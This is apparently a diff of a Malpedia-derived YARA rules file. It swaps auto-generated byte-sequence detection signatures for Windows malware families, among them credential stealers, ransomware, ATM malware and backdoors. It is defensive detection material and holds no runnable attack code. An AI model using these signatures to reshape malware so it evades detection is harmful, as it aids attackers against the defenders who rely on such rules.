-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.arkei_stealer_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightclub"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nightclub_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "fe6b8a6d2dda0769d1bf75ba6fd29670ffe1d15e24be98e7feb6639e87efec8a"
+		logic_hash = "c6e72bd1072251138d02bae0378aff5596a4fe234144ae53f2fd722485213a6d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128070,32 +128428,32 @@ rule MALPEDIA_Win_Arkei_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945e8 ffd3 6a0a 57 }
-		$sequence_1 = { 33ff 50 57 897e10 894614 }
-		$sequence_2 = { 6a00 ffd6 8b55e8 52 6a00 ffd6 }
-		$sequence_3 = { 6a00 8d4de4 51 6a0e 8d55ec 52 }
-		$sequence_4 = { 57 8945e8 ffd3 6a0a 57 8bf0 ffd3 }
-		$sequence_5 = { c3 50 8b45e8 50 }
-		$sequence_6 = { 8b45e8 50 ff15???????? 85c0 74de 8b4de8 682000cc00 }
-		$sequence_7 = { e9???????? 83f810 770a bb10000000 e9???????? 83f818 0f8783010000 }
-		$sequence_8 = { 8d448a0e 6a00 8d4de4 51 }
-		$sequence_9 = { 51 ff15???????? 85c0 0f84c4feffff 57 6880000000 }
+		$sequence_0 = { 56 8b7508 8b06 8b5020 57 8bf9 8b1f }
+		$sequence_1 = { e8???????? 85c0 0f854e150000 8b8fb0000000 8d8557fcffff 50 51 }
+		$sequence_2 = { 3bd7 0f83f7000000 8b5104 85d2 740a 8bc8 2bca }
+		$sequence_3 = { ff15???????? 8b95ccfbffff 52 ffd3 8b85d0fbffff 50 ffd3 }
+		$sequence_4 = { 890a 8b10 8b4804 50 894a04 ffd7 8b450c }
+		$sequence_5 = { 50 8d4de0 51 e8???????? 8b55e4 52 ffd7 }
+		$sequence_6 = { 3b410c 7206 33c0 5d c20400 c6410401 8b4908 }
+		$sequence_7 = { 7415 8bff 85c0 7409 8b5510 668b12 668910 }
+		$sequence_8 = { 8d45f3 33f6 8975fc 50 8975e0 68???????? 8d4dcc }
+		$sequence_9 = { 72e6 b892010000 5f 5e 8b4df8 33cd e8???????? }
 
 	condition:
-		7 of them and filesize < 1744896
+		7 of them and filesize < 247808
 }
-rule MALPEDIA_Win_Glasses_Auto : FILE
+rule MALPEDIA_Win_Elirks_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f78200de-17f0-543a-b1bc-b07d12f718a7"
+		id = "2f83629f-d917-5544-9557-f1c734a140a5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.glasses_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.elirks_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "f33966ab45324eba7508399d9cadcd3a853fcf3a139e1b51ccdad3cd57192d5a"
+		logic_hash = "23afc2f901e3fd2aa39a45f20d3907f7b1b87b547d67ae2e0da6482231d3ff66"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128109,32 +128467,32 @@ rule MALPEDIA_Win_Glasses_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd0 8d8d38f9ffff e8???????? 53 8d8d38f9ffff 898534f9ffff 51 }
-		$sequence_1 = { e8???????? 8d8d5cfaffff e8???????? 8bf8 33c0 89b5c0f9ffff 68c7000000 }
-		$sequence_2 = { e8???????? 8d8d58f7ffff c745fcffffffff e8???????? eb2e 8b8d94f7ffff 8a1439 }
-		$sequence_3 = { e8???????? 83c404 80bea100000000 b301 0f8585000000 8b86a4000000 6a01 }
-		$sequence_4 = { e8???????? 8bf8 83c404 85ff 0f84dbfdffff 683b960000 8bcf }
-		$sequence_5 = { e8???????? 8bf0 83c404 85f6 0f84add7ffff 681b010000 8bce }
-		$sequence_6 = { e8???????? 8986b4010000 e8???????? 8986e8010000 e8???????? 8986ec010000 8d4de8 }
-		$sequence_7 = { e8???????? 8d8d58ffffff e8???????? 8d8d3cffffff c645fc04 e8???????? 837f3803 }
-		$sequence_8 = { c645fc01 e8???????? 8d4d98 c645fc00 e8???????? 8d4de4 c745fcffffffff }
-		$sequence_9 = { eb07 e8???????? 8bf8 33f6 85ff 7e2b 8bff }
+		$sequence_0 = { 7532 ff15???????? 8b4b08 81e1ffffff00 }
+		$sequence_1 = { 83c40c 03d5 8bfd 8916 8b4c2410 8d442418 }
+		$sequence_2 = { 8b4c2408 8d742410 e8???????? 8d742408 e8???????? 5f 5e }
+		$sequence_3 = { 33c0 8bd6 8a0a 80f941 7c0d 80f95a 7f08 }
+		$sequence_4 = { 8d4b01 394c2414 0f8c4bffffff b801000000 5f 5e 5d }
+		$sequence_5 = { 758d 8b4c241c 5b 85c9 7e1d }
+		$sequence_6 = { e8???????? 83c410 85c0 7419 8b44241c 8b4c2418 e8???????? }
+		$sequence_7 = { 56 57 57 b8???????? e8???????? 83c40c 8bc6 }
+		$sequence_8 = { 8db348010000 7411 8b4604 83c001 99 b903000000 }
+		$sequence_9 = { 0f8423ffffff 8b8604600000 50 ffd5 }
 
 	condition:
-		7 of them and filesize < 4177920
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Globeimposter_Auto : FILE
+rule MALPEDIA_Win_Koobface_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9dd6e8ba-63ad-5aaa-964a-871b7e1e06e1"
+		id = "c6a2ece4-bdc3-570c-90b1-bf28a4d5b166"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.globeimposter_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.koobface_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "f943f3ca79204de3fa7ffd520d4eead395fff4b80988c5a103deba289f7c4696"
+		logic_hash = "c65c2ad17a47311f43f81d1b6ae6bd5717f8484a20158d9b796e403e5d9ce6a0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128148,32 +128506,32 @@ rule MALPEDIA_Win_Globeimposter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fd4e5 0f7e4f0c 0f73d120 0fd4ca }
-		$sequence_1 = { 33db 8b7d04 85ff 7413 8b4508 8d04b8 }
-		$sequence_2 = { ff15???????? 03c7 50 ff15???????? 85c0 743b 8b7c2410 }
-		$sequence_3 = { 43 85d2 7e18 8d4e7c 8b41fc 3b01 }
-		$sequence_4 = { 0f6e6614 0ff4e0 0fd4cb 0f6e7618 0ff4f0 0f7e4f04 0f73d120 }
-		$sequence_5 = { 750b ff15???????? 6ac4 58 eb0a ff15???????? }
-		$sequence_6 = { 5e eb05 b800afffff 5f }
-		$sequence_7 = { ff15???????? 6ac4 58 eb0a ff15???????? 8937 }
-		$sequence_8 = { 8bd0 85d2 7514 8b4608 8d0ca8 0119 3919 }
-		$sequence_9 = { ff742440 e8???????? 83c40c 8bc5 eb03 6ac4 }
+		$sequence_0 = { 8b8508ffffff 0fb68000294200 8919 891e }
+		$sequence_1 = { 33c0 eb1b 8d3400 8bc6 e8???????? 8965f0 8bc4 }
+		$sequence_2 = { 8d8548a2ffff 50 8d8514fcffff 50 e8???????? 83c410 84c0 }
+		$sequence_3 = { 85c0 0f85ae000000 8b45e4 8b08 53 68???????? 50 }
+		$sequence_4 = { e8???????? 8d85dca9ffff 50 e8???????? c70424???????? 8d8570a2ffff }
+		$sequence_5 = { e8???????? 8b8dccfdffff 8d850cffffff 50 c745fc04000000 e8???????? 834dfcff }
+		$sequence_6 = { 8b45e4 8b08 53 68???????? 50 ff5114 8d45ec }
+		$sequence_7 = { 8d1485a0534200 8b0a 83e61f c1e606 03ce 8a4124 02c0 }
+		$sequence_8 = { e8???????? 8b8dd0fdffff 8d850cffffff 50 c745fc17000000 e8???????? }
+		$sequence_9 = { 33cd fec0 5e e8???????? c9 c3 55 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Kasperagent_Auto : FILE
+rule MALPEDIA_Win_Green_Dispenser_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "340f4639-6fe5-58b0-bb8f-f62f0676eeb4"
+		id = "84ada711-0fc6-5325-8121-c6b1b7bed827"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kasperagent_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.green_dispenser"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.green_dispenser_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "64254218e6067b681b9ff76df50b8965f4daccd1f710c2911946f314fae43e64"
+		logic_hash = "871957685fdf3c7f3a313c97f44c2b4e50a7c0cccb8e8255b3b477d16c388ef7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128187,32 +128545,32 @@ rule MALPEDIA_Win_Kasperagent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b442420 2b442418 8b4c2428 2bc7 40 99 2bc2 }
-		$sequence_1 = { c3 e9???????? 6860020000 b8???????? e8???????? 8b4508 8b35???????? }
-		$sequence_2 = { 3b5c2410 72c3 8b742414 8b7c241c 5d 5b 2bc1 }
-		$sequence_3 = { 8b0f 8bc7 5f c6040e00 5e 5d 5b }
-		$sequence_4 = { 750d 8b46f8 50 56 e8???????? 83c408 85c0 }
-		$sequence_5 = { 8b4c2414 8b01 3b70f8 7fa9 }
-		$sequence_6 = { e8???????? 8b4500 ff442414 b92d000000 66890c78 8d7c3f02 }
-		$sequence_7 = { 668b28 668929 83c102 83c002 47 3bce }
-		$sequence_8 = { ffd0 c645fc01 8b45d8 83c0f0 }
-		$sequence_9 = { 2bc1 33d2 d1f8 2bf0 668911 8bce 781a }
+		$sequence_0 = { c60084 c6043884 03c7 03c7 b901000000 c60084 c6043884 }
+		$sequence_1 = { 51 8bd7 8bc8 e8???????? 83c404 85c0 0f8503020000 }
+		$sequence_2 = { c745fc00000000 897dc0 c745c400000000 e8???????? 8bcb e8???????? 6a01 }
+		$sequence_3 = { 53 8b5d14 56 8b7508 57 8b7d0c 81ff81000000 }
+		$sequence_4 = { c785d0fcffff0f000000 c785ccfcffff00000000 c685bcfcffff00 83bd64fdffff10 720e ffb550fdffff }
+		$sequence_5 = { 51 53 8d048a 56 8b34c510e54200 57 8b3cc514e54200 }
+		$sequence_6 = { 8b049d50aa4500 8064302480 837d0800 5f 5e 5b 7507 }
+		$sequence_7 = { 8bce e8???????? 8bf0 8b45fc ff7004 e8???????? ff75fc }
+		$sequence_8 = { e8???????? 8b45f8 83c40c 03fb 03f0 ff4df4 }
+		$sequence_9 = { 894c240c 84c0 7404 660f57c4 8b7c2414 c644242025 }
 
 	condition:
-		7 of them and filesize < 1605632
+		7 of them and filesize < 838656
 }
-rule MALPEDIA_Win_Unidentified_044_Auto : FILE
+rule MALPEDIA_Win_Rawdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b06c2db5-4f74-514b-a6ac-3ca802bc63db"
+		id = "4d5ade47-14c0-5e98-bb49-10b170788d30"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_044_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rawdoor_auto.yar#L1-L155"
 		license_url = "N/A"
-		logic_hash = "bba754b0708d8dcd8392b060bb16bcb2ec72e2dcb75dae26c5459c6dda294679"
+		logic_hash = "271dc4d0258aafb48e5ea172443314b54c134d84f01d29ab84a2d16da5831287"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128226,32 +128584,37 @@ rule MALPEDIA_Win_Unidentified_044_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 0f858afeffff e8???????? 5f 5e }
-		$sequence_1 = { 53 32db 381d???????? 761f 56 8b35???????? 0fb6c3 }
-		$sequence_2 = { 83f8ff 755f ff15???????? 3d1e270000 7552 }
-		$sequence_3 = { 893b 83ffff 7456 3935???????? 0f95c0 0fb6c8 }
-		$sequence_4 = { 8bff 0fb74c7468 0fb717 0fafc8 8be9 81e5ffff0000 2bd5 }
-		$sequence_5 = { 55 56 8bf0 803e00 8be8 }
-		$sequence_6 = { 8d4c245c 51 6a00 c744246401000000 89742468 ffd5 85c0 }
-		$sequence_7 = { c7460403000000 ffd3 5b 5f }
-		$sequence_8 = { 8d4c242c 51 e8???????? 8bbc24ec000000 668b4706 be10000000 2bf2 }
-		$sequence_9 = { 7505 b8???????? e8???????? a1???????? 56 }
+		$sequence_0 = { 81e2ff030000 81e1ff030000 c1e10a 0bca 81c100000100 }
+		$sequence_1 = { e8???????? 488bf8 488d4b14 488d542450 ff15???????? 440fb754245a 440fb75c2458 }
+		$sequence_2 = { ff15???????? eb09 488bd7 ff15???????? }
+		$sequence_3 = { c1e818 452bc1 88442423 8bc1 4183e03f }
+		$sequence_4 = { ff15???????? eb09 488bd3 ff15???????? b934000000 e8???????? 4889442430 }
+		$sequence_5 = { e8???????? 488bf8 48894610 4885c0 0f848e000000 488bcb e8???????? }
+		$sequence_6 = { e8???????? 488bf8 4889442430 4885ed 745f 33d2 488bcd }
+		$sequence_7 = { c1e906 894c2448 80e13f 48ffcb }
+		$sequence_8 = { 0000 0001 0100 0001 }
+		$sequence_9 = { 0101 0100 0000 0001 }
+		$sequence_10 = { 0304b540150310 59 5e eb05 }
+		$sequence_11 = { 030c8540150310 eb05 b9???????? f6410420 }
+		$sequence_12 = { 030c8540150310 eb02 8bcb f6412480 }
+		$sequence_13 = { 03048d40150310 eb05 b8???????? f640247f 7529 83faff }
+		$sequence_14 = { 030c8540150310 eb02 8bce f6412480 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 445440
 }
-rule MALPEDIA_Win_Blackbasta_Auto : FILE
+rule MALPEDIA_Win_Atmitch_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "056c2725-7fc6-5492-9e95-8858f5743ba4"
+		id = "72b8ffe7-fc9a-5d92-9de1-9193b095fc04"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackbasta_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atmitch_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "5917351a58e2c45d71cb940556c45aaf794c00ea6a4cfbb1a7458b7fa470cb76"
+		logic_hash = "e051c844a76319030fd5ab69ee7c6a522b22df21eb94d4b042bb698655f157ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128265,32 +128628,32 @@ rule MALPEDIA_Win_Blackbasta_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b3403 85f6 0f856f010000 eb02 33f6 80791400 7410 }
-		$sequence_1 = { e9???????? c7456001000000 83fe01 0f86ff000000 90 8d4548 50 }
-		$sequence_2 = { 8b450c 83c01c 50 8d4920 e8???????? 8b450c 8b4df0 }
-		$sequence_3 = { 56 8d581c 8d6804 7442 6a00 8bcb }
-		$sequence_4 = { 53 56 57 8bf9 8b37 85f6 747a }
-		$sequence_5 = { 56 51 6a01 8bcb ff5034 8b03 }
-		$sequence_6 = { c7471400000000 e8???????? c7461000000000 83c40c c746140f000000 c60600 be08000000 }
-		$sequence_7 = { 8d957cffffff 52 8d95d4feffff 52 ff5024 8b8dd0feffff 8d957cffffff }
-		$sequence_8 = { c7855cfeffff980a0a10 e8???????? 57 8d8d78feffff c745fc09000000 }
-		$sequence_9 = { 8975f0 c706???????? c74604???????? c74608???????? c7462060ed0910 c745fcffffffff e8???????? }
+		$sequence_0 = { c644244803 ff15???????? 8d4c2418 51 68???????? }
+		$sequence_1 = { 83c408 50 ff15???????? 56 51 8bcc }
+		$sequence_2 = { 8bfe f7df 896c241c 0fb744242c 50 51 }
+		$sequence_3 = { 51 833d????????00 7422 a1???????? 50 }
+		$sequence_4 = { 6a0d 8d4c240c ff15???????? 6a0a 8d4c240c ff15???????? 6a0a }
+		$sequence_5 = { 0bc8 51 e8???????? 0fb74e07 83c404 8bd8 }
+		$sequence_6 = { 8bcc 89642410 68???????? ff15???????? e8???????? 0fb705???????? 83c408 }
+		$sequence_7 = { ff15???????? 83bc24fc00000000 7432 8b4c2408 8b41f4 }
+		$sequence_8 = { c644244803 ff15???????? 8d4c2418 51 68???????? 8d542428 52 }
+		$sequence_9 = { 83c404 50 ff15???????? 50 51 }
 
 	condition:
-		7 of them and filesize < 1758208
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Gandcrab_Auto : FILE
+rule MALPEDIA_Win_Phoreal_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b13655d9-7544-5839-87c5-fd4e5e753f37"
+		id = "9354abd9-a851-5d8e-a424-1be008c5ab6c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gandcrab_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.phoreal_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "cdc40f7d17830a090b941b5f5b366bcc6036a417302630b2621031aa8f4178c1"
+		logic_hash = "904dd636d7db526ab8a0410c75a52ee0fac4292f0f4ce7ff0cd1d42961fa831e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128304,34 +128667,34 @@ rule MALPEDIA_Win_Gandcrab_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 837f4800 741b ff7750 ff15???????? ff774c }
-		$sequence_1 = { ff15???????? ff7728 8bf0 ff15???????? 03c3 8d5e04 }
-		$sequence_2 = { 03c3 8d5e04 03d8 837f3c00 741b ff7744 ff15???????? }
-		$sequence_3 = { 837f3c00 741b ff7744 ff15???????? }
-		$sequence_4 = { 03d8 837f5400 741b ff775c ff15???????? ff7758 8bf0 }
-		$sequence_5 = { 03c3 8d5e04 03d8 83bf8000000000 }
-		$sequence_6 = { 741b ff772c ff15???????? ff7728 8bf0 ff15???????? 03c3 }
-		$sequence_7 = { ff774c 8bf0 ff15???????? 03c3 8d5e04 }
-		$sequence_8 = { 741b ff7738 ff15???????? ff7734 }
-		$sequence_9 = { 837f3c00 741b ff7744 ff15???????? ff7740 8bf0 ff15???????? }
+		$sequence_0 = { 51 8b4b64 8d542418 52 8b5054 }
+		$sequence_1 = { 8bf8 8d4dd4 3bcf 7465 837de808 720c 8b55d4 }
+		$sequence_2 = { 8b1d???????? 8b4510 8b4d0c 50 8b4508 56 8d140f }
+		$sequence_3 = { e8???????? 837dc808 8b45b4 7302 8bc7 50 6a00 }
+		$sequence_4 = { 8bec 83ec38 56 8b7508 8b4660 }
+		$sequence_5 = { 0f8460feffff ff432c 8b432c 8b7c2418 89442450 33c0 89442454 }
+		$sequence_6 = { ff15???????? 8d8578ffffff 50 8d4de0 51 }
+		$sequence_7 = { 50 ffd6 85c0 7527 ff15???????? 3d0f000980 0f85cb010000 }
+		$sequence_8 = { d1e8 8d1443 53 8db590feffff e8???????? 8bf8 8db550ffffff }
+		$sequence_9 = { 85c0 7422 8b17 8910 8b4f04 894804 8b5708 }
 
 	condition:
-		7 of them and filesize < 1024000
+		7 of them and filesize < 622592
 }
-rule MALPEDIA_Win_Zeus_Openssl_Auto : FILE
+rule MALPEDIA_Win_Boatlaunch_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "550619dc-6f15-5f3b-ac49-6d6bb9526626"
+		id = "17aecbbe-5b2a-5c30-99c2-803688504adb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zeus_openssl_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boatlaunch"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.boatlaunch_auto.yar#L1-L172"
 		license_url = "N/A"
-		logic_hash = "ad90787c109d806e4177874e3ce46219d993226aadc9cde55e3f2e9866998d97"
+		logic_hash = "1f8a4849474a78f820c262b22058fdfb27def9aa1bc7516915781a893805dbc5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -128343,34 +128706,40 @@ rule MALPEDIA_Win_Zeus_Openssl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8981bc160000 8b4108 881c02 ff4114 }
-		$sequence_1 = { 8945dc 0f855fffffff 85db 0f84d5000000 8d5eff 81c69e050000 8d3c71 }
-		$sequence_2 = { 0fb600 8bcf d3e0 8d4f08 03d0 8b45f8 40 }
-		$sequence_3 = { b801000000 d3e0 8b4df4 48 23c2 014140 }
-		$sequence_4 = { 8bc8 d3ea 8b4df4 2bf0 0181c41b0000 8955f8 8b4140 }
-		$sequence_5 = { 894df8 8b88bc160000 8bd6 2b55f8 }
-		$sequence_6 = { 8b8570ffffff 2bda 8d0c81 894dac 8955b4 b801000000 }
-		$sequence_7 = { c20400 56 8bf1 8a06 84c0 740c }
-		$sequence_8 = { 884dff 8a0c07 884dfe 8b4df0 8db002010000 3bb98c000000 7209 }
-		$sequence_9 = { 8b4708 894710 8b06 83781000 0f849c010000 8b5dfc 8b7e5c }
+		$sequence_0 = { 488d15a1190000 e8???????? e8???????? 488bd8 4885db 7468 }
+		$sequence_1 = { eb05 e9???????? 48837dc800 7412 488b0d???????? 33d2 4c8b45c8 }
+		$sequence_2 = { 488b4030 4883c408 c3 4855 4883ec20 488d6c2420 }
+		$sequence_3 = { 85c0 7501 ab 8bfe }
+		$sequence_4 = { c745f800000000 8d5ddc c70318000000 c7430400000000 c7430800000000 c7430c00000000 c7431000000000 }
+		$sequence_5 = { 7505 e9???????? 8bf8 6800010000 8d85e0eeffff 50 }
+		$sequence_6 = { e8???????? 3dffea2d66 7524 ff7344 e8???????? 3b05???????? }
+		$sequence_7 = { 4489442418 4855 53 51 }
+		$sequence_8 = { eb05 4b 85db 75ec }
+		$sequence_9 = { 8b487c 894de0 ff75e0 6a00 ff35???????? e8???????? }
+		$sequence_10 = { 56 57 4883ec08 488bec 488d35211e0000 }
+		$sequence_11 = { ff75f8 6a00 ff35???????? e8???????? 8945f4 8d45f8 50 }
+		$sequence_12 = { 85c0 7425 8d55f7 c70233c0c218 c6420400 6a00 }
+		$sequence_13 = { 4c8b4500 e8???????? 488b4508 488d6518 415b 415a 4159 }
+		$sequence_14 = { 52 56 57 4150 }
+		$sequence_15 = { 48ad 4885c0 740e 488bc8 e8???????? }
 
 	condition:
-		7 of them and filesize < 4546560
+		7 of them and filesize < 33792
 }
-rule MALPEDIA_Win_Floxif_Auto : FILE
+rule MALPEDIA_Win_Tidepool_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "41f034c6-3e3f-5292-917b-f675df5b6d2a"
+		id = "c47d0b4d-1c2a-583a-a083-2239d9e6be2a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.floxif_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tidepool_auto.yar#L1-L265"
 		license_url = "N/A"
-		logic_hash = "f5031af55712b6d9a11fdedff6451f65aebc55a1ba940596ca5431dc225391dd"
+		logic_hash = "81ef950afde11d443ee135cd0277277468eb293508aa726a79916bd48024f136"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -128382,32 +128751,50 @@ rule MALPEDIA_Win_Floxif_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c404 50 8d4d84 e8???????? 83f8ff 0f85ac000000 6a00 }
-		$sequence_1 = { 80a0405d021000 40 41 41 }
-		$sequence_2 = { 8b55e0 8d440afc 50 8d4dc0 51 e8???????? }
-		$sequence_3 = { 85c0 0f8677010000 c745a800000000 eb09 8b45a8 83c001 }
-		$sequence_4 = { f6c201 7416 8088????????10 8a9405ecfdffff 8890405d0210 eb1c }
-		$sequence_5 = { c645f2ac c645f392 c645f4b0 c645f5ab c645f6b4 }
-		$sequence_6 = { c6458f00 c64590e0 c64591ee c64592ec c64593eb c64594e8 c64595e8 }
-		$sequence_7 = { c705????????01000000 50 a3???????? e8???????? 8db60c0f0210 bf???????? a5 }
-		$sequence_8 = { 50 8b4df0 e8???????? 8b4df0 8b55f0 8b410c 2b4204 }
-		$sequence_9 = { e9???????? 33d2 8a15???????? 83fa01 7514 c6458801 8d4df0 }
+		$sequence_0 = { 5e c20400 80790800 c701???????? 740e 8b4904 }
+		$sequence_1 = { 6a00 50 8b08 ff91a4000000 }
+		$sequence_2 = { 5b 8b8d00030000 33cd e8???????? 81c504030000 }
+		$sequence_3 = { e8???????? 83c404 8bc6 5e c20400 80790800 }
+		$sequence_4 = { 64890d00000000 59 5f 5e 5b 8b8d00030000 }
+		$sequence_5 = { 83e906 51 83c006 50 6a02 }
+		$sequence_6 = { 6800000040 8d4500 50 ff15???????? }
+		$sequence_7 = { 83c40c 803d????????37 7518 68???????? }
+		$sequence_8 = { 33db 53 6a02 8bf1 e8???????? }
+		$sequence_9 = { 8d5668 52 8d5658 52 50 ff91d0000000 33ff }
+		$sequence_10 = { 75f9 b8???????? b900000400 c60000 40 49 }
+		$sequence_11 = { 8b4654 8d9698000000 52 8d5678 }
+		$sequence_12 = { 50 8b08 ff5138 47 83ff14 }
+		$sequence_13 = { 8d45ec 50 681f000200 53 }
+		$sequence_14 = { 57 50 6802020000 ff15???????? 68???????? ff15???????? 8bf8 }
+		$sequence_15 = { c60000 40 49 75f9 b8???????? b900000400 }
+		$sequence_16 = { 6810270000 ff15???????? 8b45ec 8b08 }
+		$sequence_17 = { 681f000200 56 68???????? 6801000080 }
+		$sequence_18 = { e8???????? 68???????? 68???????? 68???????? 8d4500 50 }
+		$sequence_19 = { c3 56 8bf1 e8???????? 8b4654 6a00 }
+		$sequence_20 = { 8be9 895c2418 0f8e62020000 83c0ff c1e802 }
+		$sequence_21 = { ff75ec ff15???????? 8b35???????? 6a04 }
+		$sequence_22 = { e8???????? 83c43c 8d45f8 50 683f000f00 53 ff75fc }
+		$sequence_23 = { 8d45fc 50 683f000f00 53 ff75f8 57 }
+		$sequence_24 = { b940000000 33c0 f2aa ff5614 6850010000 }
